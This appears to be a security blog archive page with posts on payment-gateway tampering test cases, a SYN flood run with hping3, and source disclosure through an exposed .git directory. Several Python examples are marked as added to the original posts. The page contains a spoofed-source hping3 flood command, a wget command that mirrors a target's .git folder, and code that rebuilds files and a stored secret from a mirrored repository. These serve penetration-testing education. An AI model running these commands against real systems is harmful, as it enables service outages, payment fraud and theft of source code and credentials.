Posts

Showing posts from April, 2022

Test Cases for Payment Gateway Security Testing

Threat: An adversary can tamper with parameters in HTTP requests and responses to manipulate transactions
  Test page: Pages between the merchant site and the payment gateway page
  Test names:
  - Tamper with the amount value in the request to the payment gateway.
  - Change the amount as well as its generated hash value to a lesser amount and the hash value corresponding to that amount.
  - Change the quantity of the product to a higher value.
  - Check whether the amount value is encoded or encrypted. If it is only encoded, decode the amount, change it and encode it again, or replace it with the encoded form of a lower amount.
  - Change the product (through product id or description) to a higher-value product.
  - Is hash/integrity verification done only on a limited set of parameters?
  Test page: Anywhere in the site
  - Check whether sensitive information is disclosed in error pages or source code.

Threat: An adversary can manipulate transactions made through a payment gateway
  Test page: Pages before the payment gateway
  - Change the amount that is to be paid before the request hits the payment gateway.
  Test page: Page/Request after the p
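The test cases above boil down to one question: which fields does the integrity hash actually cover, and does the merchant recompute the price on its own side? The following added example (not code from the original page; the shared key, the product catalog and the hash layout are constructed for illustration) models a merchant, a gateway and an attacker, and runs the amount, hash-substitution, quantity and encoded-amount test cases against a weak scheme that signs only the amount and a stronger scheme that signs every field that determines what the buyer receives.

```python
import base64
import hashlib
import hmac
from decimal import Decimal

# Constructed values for the example: the merchant/gateway shared key and a
# server-side price list. Neither comes from the original page.
MERCHANT_KEY = b"merchant-gateway-shared-secret-constructed"
CATALOG = {"SKU-100": Decimal("10.00"), "SKU-900": Decimal("900.00")}

# Two integrity schemes under test: one signs only the amount, the other signs
# every field that determines what the buyer actually receives.
WEAK_COVERED = ("amount",)
STRONG_COVERED = ("product_id", "qty", "amount")


def sign(fields, covered):
    """HMAC over the covered fields, in a fixed order, as the merchant sends it."""
    msg = "|".join("%s=%s" % (k, fields[k]) for k in covered).encode()
    return hmac.new(MERCHANT_KEY, msg, hashlib.sha256).hexdigest()


def build_request(product_id, qty, covered):
    """Merchant builds the redirect to the gateway from its own catalog price."""
    fields = {"product_id": product_id, "qty": str(qty),
              "amount": str(CATALOG[product_id] * qty)}
    fields["hash"] = sign(fields, covered)
    return fields


def gateway_verify(fields, covered):
    """Gateway side: recompute the hash over the covered fields only."""
    return hmac.compare_digest(sign(fields, covered), fields.get("hash", ""))


def merchant_recompute(fields):
    """Merchant side, on the payment callback: does the paid amount match what
    the catalog says this product and quantity cost?"""
    return Decimal(fields["amount"]) == CATALOG[fields["product_id"]] * int(fields["qty"])


def attack_amount_only(covered):
    """Test case: lower the amount but leave the hash alone."""
    req = build_request("SKU-900", 1, covered)
    return gateway_verify(dict(req, amount="1.00"), covered)


def attack_hash_substitution(covered):
    """Test case: change amount and hash together, reusing the amount and the
    valid hash captured from a cheaper legitimate order."""
    cheap = build_request("SKU-100", 1, covered)
    expensive = build_request("SKU-900", 1, covered)
    tampered = dict(expensive, amount=cheap["amount"], hash=cheap["hash"])
    return gateway_verify(tampered, covered)


def attack_quantity(covered):
    """Test case: raise the quantity, keep amount and hash.
    Returns (gateway accepts?, merchant recomputation accepts?)."""
    tampered = dict(build_request("SKU-100", 1, covered), qty="5")
    return gateway_verify(tampered, covered), merchant_recompute(tampered)


def reencode_amount(encoded_amount, new_amount):
    """Test case: an encoded amount is not a protected amount.
    Returns the decoded original and the re-encoded replacement."""
    original = base64.b64decode(encoded_amount).decode()
    return original, base64.b64encode(new_amount.encode()).decode()


if __name__ == "__main__":
    for name, covered in (("weak", WEAK_COVERED), ("strong", STRONG_COVERED)):
        print(name, "amount only:", attack_amount_only(covered),
              "hash substitution:", attack_hash_substitution(covered),
              "quantity:", attack_quantity(covered))
    print(reencode_amount("OTAwLjAw", "1.00"))
```

With the weak scheme the gateway happily accepts a 900.00 product paid at 10.00 (hash substitution) and a quantity of 5 paid at the price of 1; only the merchant's server-side recomputation catches the quantity case. Signing product, quantity and amount together closes both, which is exactly what the "limited parameters" test case is probing for.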

Simulating SYN Flooding Attack(DOS)

Basic 3-way TCP handshake: the client sends a SYN, the server answers with a SYN-ACK and keeps a half-open (SYN-RECV) entry in its listen backlog, and the client completes the connection with an ACK.

State during a SYN flooding attack: the attacker sends SYNs, usually from spoofed source addresses, and never sends the final ACK, so the server's backlog fills with half-open connections and SYNs from legitimate clients are dropped.

Example of a SYN flood (DoS) attack with hping3 on Kali Linux:

Note: in this case both the attacker's system and the victim server are in the same network.

Step#1: Victim server: 192.168.1.100
Step#2: Attacker's system: 192.168.1.102
Step#3: Install hping3 on Kali with the command below:
# sudo apt-get install hping3
Step#4: Now the attacker uses hping3 (or a similar tool) to send SYN packets with random spoofed source addresses. Start the SYN flood against the target (192.168.1.100) with the command below:
# hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.100

The SYN flooding attack has now started. The options in the command above in detail:
-c 15000: send 15000 packets
-d 120: each packet carries 120 bytes of data
-S: set the SYN flag
-w 64: TCP window size of 64
-p 80: target port 80, the victim's web server
--flood: send as fast as possible without displaying replies; stop it with Ctrl-C
--rand-source: use a random spoofed source IP address for every packet, so the SYN-ACKs go to hosts that never complete the handshake and the traffic does not point back at the attacker

To confirm the effect on the victim, count its half-open connections, for example with ss -tn state syn-recv: a growing number of SYN-RECV entries from many unrelated source addresses is the signature of the attack.
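To make the "state during SYN flooding" picture concrete, here is an added simulation (not code from the original post or from hping3) of a listener's half-open queue. The backlog size, the client addresses and the packet counts are made up for the example; a real TCP stack also expires SYN-RECV entries after retransmitting the SYN-ACK, which this model leaves out, and that timer is why the real attack needs --flood to keep the queue full.

```python
import ipaddress
import random

# Hypothetical listen backlog size for the example. Real stacks size this from
# somaxconn / tcp_max_syn_backlog and, unlike this model, expire stale entries.
BACKLOG = 128


class Listener:
    """Minimal model of a TCP listener's half-open (SYN-RECV) queue."""

    def __init__(self, backlog, rng):
        self.backlog = backlog
        self.rng = rng
        self.half_open = {}      # (src_ip, src_port) -> server ISN
        self.established = set()
        self.dropped_syns = 0

    def on_syn(self, src_ip, src_port, client_seq):
        """SYN received: reserve a backlog slot and answer with SYN-ACK."""
        if len(self.half_open) >= self.backlog:
            self.dropped_syns += 1   # queue full: the SYN is silently dropped
            return None
        server_isn = self.rng.getrandbits(32)
        self.half_open[(src_ip, src_port)] = server_isn
        return {"flags": "SYN-ACK", "seq": server_isn,
                "ack": (client_seq + 1) & 0xFFFFFFFF}

    def on_ack(self, src_ip, src_port, ack):
        """Final ACK received: promote the half-open entry to ESTABLISHED."""
        server_isn = self.half_open.get((src_ip, src_port))
        if server_isn is None or ack != (server_isn + 1) & 0xFFFFFFFF:
            return False
        del self.half_open[(src_ip, src_port)]
        self.established.add((src_ip, src_port))
        return True


def legit_connect(listener, ip, port):
    """A real client completes all three steps of the handshake."""
    synack = listener.on_syn(ip, port, client_seq=1000)
    if synack is None:
        return False                # SYN dropped: connection attempt fails
    return listener.on_ack(ip, port, (synack["seq"] + 1) & 0xFFFFFFFF)


def spoofed_syn_flood(listener, packets, rng):
    """Equivalent of hping3 --flood --rand-source: SYNs from random sources.

    The SYN-ACKs go to addresses that never asked for them, so nobody sends
    the final ACK and every accepted SYN stays half-open."""
    for _ in range(packets):
        src = str(ipaddress.IPv4Address(rng.getrandbits(32)))
        listener.on_syn(src, rng.randint(1024, 65535), rng.getrandbits(32))


def simulate(flood_packets, backlog=BACKLOG, seed=1):
    """Connect once before the flood, flood, then try to connect again."""
    rng = random.Random(seed)
    listener = Listener(backlog, rng)
    before = legit_connect(listener, "192.168.1.50", 40000)
    spoofed_syn_flood(listener, flood_packets, rng)
    after = legit_connect(listener, "192.168.1.51", 40001)
    return {
        "legit_before_flood": before,
        "half_open": len(listener.half_open),
        "dropped_syns": listener.dropped_syns,
        "legit_during_flood": after,
    }


if __name__ == "__main__":
    print(simulate(0))
    print(simulate(15000))   # same packet count as the hping3 -c 15000 example
```

The second run shows the whole attack in numbers: 128 half-open entries that will never complete, every later SYN dropped, and the legitimate client's connection attempt failing even though the server itself is idle.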

Directory Traversal and Source code disclosure vulnerability

(What's the main issue in the application?)
The web server exposes the application's source code through its version control system, Git. Directory listing is enabled on the server, which discloses the directories that store sensitive files related to the source code.

(Who can access? What are the possible risks?)
An external attacker may download the source code and disclose sensitive information regarding the development, and possibly other sensitive data.

In the application I found two ways of disclosing source code.

Instance#1: After running nikto I found directories as shown. An attacker may use automated tools to discover, download and extract git repositories, for example:
https://github.com/internetwache/GitTools

Note: because directory listing is enabled on the server, the git repository can be downloaded even more easily with a simple wget command:
wget --mirror -I .git TARGET.COM/.git/
Without directory listing the attacker cannot enumerate .git/objects, so the repository has to be fetched object by object instead, starting from .git/HEAD, .git/index and the refs, and following the object hashes they contain.

Instance#2: The attacker may run a directory fuzzing attack and disclose direc
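What "extract" means once the .git directory has been mirrored is worth seeing end to end: the loose objects are zlib-compressed, hash-addressed files, and following HEAD to the commit, the commit to its tree and the tree to its blobs reconstructs the working copy. The following added example (not GitTools' code and not from the original post) builds a tiny repository in memory, standing in for the files wget would have mirrored, and walks it back to source files; the repository contents, the branch name and the "secret" in .env are constructed for the example.

```python
import hashlib
import zlib


def git_object(kind, body):
    """Encode a loose object the way git stores it: header + body, zlib-compressed."""
    raw = kind.encode() + b" " + str(len(body)).encode() + b"\0" + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_demo_repo():
    """Constructed stand-in for the files wget would mirror from TARGET.COM/.git/.
    Keys are paths relative to .git/, values are the raw file bytes."""
    files = {}

    def put(kind, body):
        sha, compressed = git_object(kind, body)
        files["objects/%s/%s" % (sha[:2], sha[2:])] = compressed
        return sha

    env_blob = put("blob", b"DB_PASSWORD=constructed-example-secret\n")
    app_blob = put("blob", b"print('hello from the leaked source')\n")
    # tree entries are "<mode> <name>\0<20-byte binary sha>", sorted by name
    entries = sorted([(b"100644", b".env", env_blob), (b"100644", b"app.py", app_blob)],
                     key=lambda e: e[1])
    tree = put("tree", b"".join(m + b" " + n + b"\0" + bytes.fromhex(s) for m, n, s in entries))
    commit = put("commit", b"\n".join([
        b"tree " + tree.encode(),
        b"author Dev <dev@example.com> 0 +0000",
        b"committer Dev <dev@example.com> 0 +0000",
        b"", b"initial import", b""]))
    files["HEAD"] = b"ref: refs/heads/main\n"
    files["refs/heads/main"] = commit.encode() + b"\n"
    return files


def looks_like_exposed_head(body):
    """Quick check that a 200 for /.git/HEAD is real and not a catch-all page:
    HEAD is either a symbolic ref or a bare 40-hex commit hash."""
    text = body.strip()
    return text.startswith(b"ref: refs/") or (
        len(text) == 40 and all(c in b"0123456789abcdef" for c in text))


def read_object(files, sha):
    """Inflate objects/xx/yyyy..., verify its hash, return (type, body)."""
    raw = zlib.decompress(files["objects/%s/%s" % (sha[:2], sha[2:])])
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("corrupt object " + sha)
    header, _, body = raw.partition(b"\0")
    kind, size = header.split(b" ")
    if int(size) != len(body):
        raise ValueError("bad size in " + sha)
    return kind.decode(), body


def parse_tree(body):
    """Split a tree body into (mode, name, hex sha) entries."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].split(b" ", 1)
        entries.append((mode.decode(), name.decode(), body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def walk_tree(files, tree_sha, prefix=""):
    """Recursively turn a tree into {path: file content}."""
    out = {}
    for _mode, name, sha in parse_tree(read_object(files, tree_sha)[1]):
        kind, body = read_object(files, sha)
        if kind == "tree":
            out.update(walk_tree(files, sha, prefix + name + "/"))
        else:
            out[prefix + name] = body
    return out


def extract_head(files):
    """Follow HEAD -> ref -> commit -> tree -> blobs, like a git extractor does."""
    head = files["HEAD"].strip()
    if head.startswith(b"ref: "):
        head = files[head[5:].decode()].strip()
    kind, body = read_object(files, head.decode())
    if kind != "commit":
        raise ValueError("HEAD does not point to a commit")
    tree_sha = body.split(b"\n", 1)[0].split(b" ", 1)[1].decode()
    return walk_tree(files, tree_sha)


if __name__ == "__main__":
    repo = build_demo_repo()
    for path, content in sorted(extract_head(repo).items()):
        print(path, content.decode().rstrip())
```

The same walk works against a real mirror by replacing the dictionary with reads from the downloaded .git directory; the hash check in read_object is what tells you a truncated or HTML-error-page "object" apart from a genuine one, and looks_like_exposed_head is the first thing to run before spending time on a full download.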